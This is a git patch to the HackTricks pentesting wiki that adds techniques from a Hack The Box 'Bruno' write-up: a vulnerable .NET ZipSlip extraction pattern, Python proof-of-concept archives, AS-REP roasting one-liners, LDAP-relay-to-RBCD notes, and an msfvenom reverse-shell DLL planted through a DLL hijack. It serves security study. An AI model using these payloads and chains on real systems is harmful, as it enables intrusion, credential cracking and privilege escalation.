From 5a5a07a91ff68d2d075329dc949406c84064ca8f Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Tue, 24 Feb 2026 13:08:19 +0000 Subject: [PATCH] Add content from: HTB: Bruno --- .../archive-extraction-path-traversal.md | 28 +++++++++++++++++++ .../asreproast.md | 7 +++++ .../ldap-signing-and-channel-binding.md | 3 ++ .../resource-based-constrained-delegation.md | 3 ++ .../dll-hijacking/README.md | 19 ++++++++++++- 5 files changed, 59 insertions(+), 1 deletion(-) diff --git a/src/generic-hacking/archive-extraction-path-traversal.md b/src/generic-hacking/archive-extraction-path-traversal.md index f371bcd3c25..88d41b226ff 100644 --- a/src/generic-hacking/archive-extraction-path-traversal.md +++ b/src/generic-hacking/archive-extraction-path-traversal.md @@ -18,6 +18,32 @@ Consequences range from overwriting arbitrary files to directly achieving **remo 2. Victim extracts the archive with a vulnerable tool that trusts the embedded path (or follows symlinks) instead of sanitising it or forcing extraction beneath the chosen directory. 3. The file is written in the attacker-controlled location and executed/loaded next time the system or user triggers that path. +### .NET `Path.Combine` + `ZipArchive` traversal + +A common .NET anti-pattern is combining the intended destination with **user-controlled** `ZipArchiveEntry.FullName` and extracting without path normalisation: + +```csharp +using (var zip = ZipFile.OpenRead(zipPath)) +{ + foreach (var entry in zip.Entries) + { + var dest = Path.Combine(@"C:\samples\queue\", entry.FullName); // drops base if FullName is absolute + entry.ExtractToFile(dest); + } +} +``` + +- If `entry.FullName` starts with `..\\` it traverses; if it is an **absolute path** the left-hand component is discarded entirely, yielding an **arbitrary file write** as the extraction identity. +- Proof-of-concept archive to write into a sibling `app` directory watched by a scheduled scanner: + +```python +import zipfile +with zipfile.ZipFile("slip.zip", "w") as z: + z.writestr("../app/0xdf.txt", "ABCD") +``` + +Dropping that ZIP into the monitored inbox results in `C:\samples\app\0xdf.txt`, proving traversal outside `C:\samples\queue\` and enabling follow-on primitives (e.g., DLL hijacks). + ## Real-World Example – WinRAR ≤ 7.12 (CVE-2025-8088) WinRAR for Windows (including the `rar` / `unrar` CLI, the DLL and the portable source) failed to validate filenames during extraction. @@ -97,5 +123,7 @@ ESET reported RomCom (Storm-0978/UNC2596) spear-phishing campaigns that attached - [Trend Micro ZDI-25-949 – 7-Zip symlink ZIP traversal (CVE-2025-11001)](https://www.zerodayinitiative.com/advisories/ZDI-25-949/) - [JFrog Research – mholt/archiver Zip-Slip (CVE-2025-3445)](https://research.jfrog.com/vulnerabilities/archiver-zip-slip/) +- [Meziantou – Prevent Zip Slip in .NET](https://www.meziantou.net/prevent-zip-slip-in-dotnet.htm) +- [0xdf – HTB Bruno ZipSlip → DLL hijack chain](https://0xdf.gitlab.io/2026/02/24/htb-bruno.html) {{#include ../banners/hacktricks-training.md}} diff --git a/src/windows-hardening/active-directory-methodology/asreproast.md b/src/windows-hardening/active-directory-methodology/asreproast.md index 305461a8888..75b9e8a2ad9 100644 --- a/src/windows-hardening/active-directory-methodology/asreproast.md +++ b/src/windows-hardening/active-directory-methodology/asreproast.md @@ -39,6 +39,12 @@ Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github > [!WARNING] > AS-REP Roasting with Rubeus will generate a 4768 with an encryption type of 0x17 and preauth type of 0. +#### Quick one-liners (Linux) + +- Enumerate potential targets first (e.g., from leaked build paths) with Kerberos userenum: `kerbrute userenum users.txt -d domain --dc dc.domain` +- Pull a single user’s AS-REP even with a **blank** password using `netexec ldap -u svc_scan -p '' --asreproast out.asreproast` (netexec also prints LDAP signing/channel binding posture). +- Crack with `hashcat out.asreproast /path/rockyou.txt` – it auto-detects **-m 18200** (etype 23) for AS-REP roast hashes. + ### Cracking ```bash @@ -77,6 +83,7 @@ ASRepCatcher listen ## References - [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat) +- [0xdf – HTB Bruno (AS-REP roast → ZipSlip → DLL hijack)](https://0xdf.gitlab.io/2026/02/24/htb-bruno.html) --- diff --git a/src/windows-hardening/active-directory-methodology/ldap-signing-and-channel-binding.md b/src/windows-hardening/active-directory-methodology/ldap-signing-and-channel-binding.md index 15ac42a89b8..1b76791da25 100644 --- a/src/windows-hardening/active-directory-methodology/ldap-signing-and-channel-binding.md +++ b/src/windows-hardening/active-directory-methodology/ldap-signing-and-channel-binding.md @@ -9,6 +9,8 @@ LDAP relay/MITM lets attackers forward binds to Domain Controllers to obtain aut - **LDAP Channel Binding (CBT)** ties an LDAPS bind to the specific TLS tunnel, breaking relays/replays across different channels. - **LDAP Signing** forces integrity-protected LDAP messages, preventing tampering and most unsigned relays. +**Quick offensive check**: tools like `netexec ldap -u user -p pass` print the server posture. If you see `(signing:None)` and `(channel binding:Never)`, Kerberos/NTLM **relays to LDAP** are viable (e.g., using KrbRelayUp to write `msDS-AllowedToActOnBehalfOfOtherIdentity` for RBCD and impersonate administrators). + **Server 2025 DCs** introduce a new GPO (**LDAP server signing requirements Enforcement**) that defaults to **Require Signing** when left **Not Configured**. To avoid enforcement you must explicitly set that policy to **Disabled**. ## LDAP Channel Binding (LDAPS only) @@ -56,5 +58,6 @@ Reg Add HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Diagnostics /v "16 LDAP Inte - [TrustedSec - LDAP Channel Binding and LDAP Signing](https://trustedsec.com/blog/ldap-channel-binding-and-ldap-signing) - [Microsoft KB4520412 - LDAP channel binding & signing requirements](https://support.microsoft.com/en-us/topic/2020-and-2023-ldap-channel-binding-and-ldap-signing-requirements-for-windows-kb4520412-ef185fb8-00f7-167d-744c-f299a66fc00a) - [Microsoft CVE-2017-8563 - LDAP relay mitigation update](https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8563) +- [0xdf – HTB Bruno (LDAP signing disabled → Kerberos relay → RBCD)](https://0xdf.gitlab.io/2026/02/24/htb-bruno.html) {{#include ../../banners/hacktricks-training.md}} diff --git a/src/windows-hardening/active-directory-methodology/resource-based-constrained-delegation.md b/src/windows-hardening/active-directory-methodology/resource-based-constrained-delegation.md index d148f338526..9462a3a49ae 100644 --- a/src/windows-hardening/active-directory-methodology/resource-based-constrained-delegation.md +++ b/src/windows-hardening/active-directory-methodology/resource-based-constrained-delegation.md @@ -216,6 +216,8 @@ adws-enumeration.md ../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md {{#endref}} +- If LDAP signing/channel binding are **disabled** and you can create a machine account, tools like **KrbRelayUp** can relay a coerced Kerberos auth to LDAP, set `msDS-AllowedToActOnBehalfOfOtherIdentity` for your machine account on the target computer object, and immediately impersonate **Administrator** via S4U from off-host. + ## References - [https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html](https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html) @@ -225,6 +227,7 @@ adws-enumeration.md - [https://posts.specterops.io/kerberosity-killed-the-domain-an-offensive-kerberos-overview-eb04b1402c61](https://posts.specterops.io/kerberosity-killed-the-domain-an-offensive-kerberos-overview-eb04b1402c61) - Impacket rbcd.py (official): https://github.com/fortra/impacket/blob/master/examples/rbcd.py - Quick Linux cheatsheet with recent syntax: https://tldrbins.github.io/rbcd/ +- [0xdf – HTB Bruno (LDAP signing off → Kerberos relay to RBCD)](https://0xdf.gitlab.io/2026/02/24/htb-bruno.html) {{#include ../../banners/hacktricks-training.md}} diff --git a/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/README.md b/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/README.md index 7d8d9a9b494..a3692e61473 100644 --- a/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/README.md +++ b/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/README.md @@ -68,6 +68,21 @@ Finally, note that **a dll could be loaded indicating the absolute path instead There are other ways to alter the ways to alter the search order but I'm not going to explain them here. +### Chaining an arbitrary file write into a missing-DLL hijack + +1. Use **ProcMon** filters (`Process Name` = target EXE, `Path` ends with `.dll`, `Result` = `NAME NOT FOUND`) to collect DLL names that the process probes but cannot find. +2. If the binary runs on a **schedule/service**, dropping a DLL with one of those names into the **application directory** (search-order entry #1) will be loaded on the next execution. In one .NET scanner case the process looked for `hostfxr.dll` in `C:\samples\app\` before loading the real copy from `C:\Program Files\dotnet\fxr\...`. +3. Build a payload DLL (e.g. reverse shell) with any export: `msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT=443 -f dll -o hostfxr.dll`. +4. If your primitive is a **ZipSlip-style arbitrary write**, craft a ZIP whose entry escapes the extraction dir so the DLL lands in the app folder: + +```python +import zipfile +with zipfile.ZipFile("slip-shell.zip", "w") as z: + z.writestr("../app/hostfxr.dll", open("hostfxr.dll","rb").read()) +``` + +5. Deliver the archive to the watched inbox/share; when the scheduled task re-launches the process it loads the malicious DLL and executes your code as the service account. + ### Forcing sideloading via RTL_USER_PROCESS_PARAMETERS.DllPath An advanced way to deterministically influence the DLL search path of a newly created process is to set the DllPath field in RTL_USER_PROCESS_PARAMETERS when creating the process with ntdll’s native APIs. By supplying an attacker-controlled directory here, a target process that resolves an imported DLL by name (no absolute path and not using the safe loading flags) can be forced to load a malicious DLL from that directory. @@ -561,6 +576,8 @@ C:\ProgramData\USOShared\tcc.exe -nostdlib -run conf.c - [Unit 42 – Digital Doppelgangers: Anatomy of Evolving Impersonation Campaigns Distributing Gh0st RAT](https://unit42.paloaltonetworks.com/impersonation-campaigns-deliver-gh0st-rat/) - [Check Point Research – Inside Ink Dragon: Revealing the Relay Network and Inner Workings of a Stealthy Offensive Operation](https://research.checkpoint.com/2025/ink-dragons-relay-network-and-offensive-operation/) - [Rapid7 – The Chrysalis Backdoor: A Deep Dive into Lotus Blossom’s toolkit](https://www.rapid7.com/blog/post/tr-chrysalis-backdoor-dive-into-lotus-blossoms-toolkit) +- [0xdf – HTB Bruno ZipSlip → DLL hijack chain](https://0xdf.gitlab.io/2026/02/24/htb-bruno.html) + +{{#include ../../../banners/hacktricks-training.md}} -{{#include ../../../banners/hacktricks-training.md}} \ No newline at end of file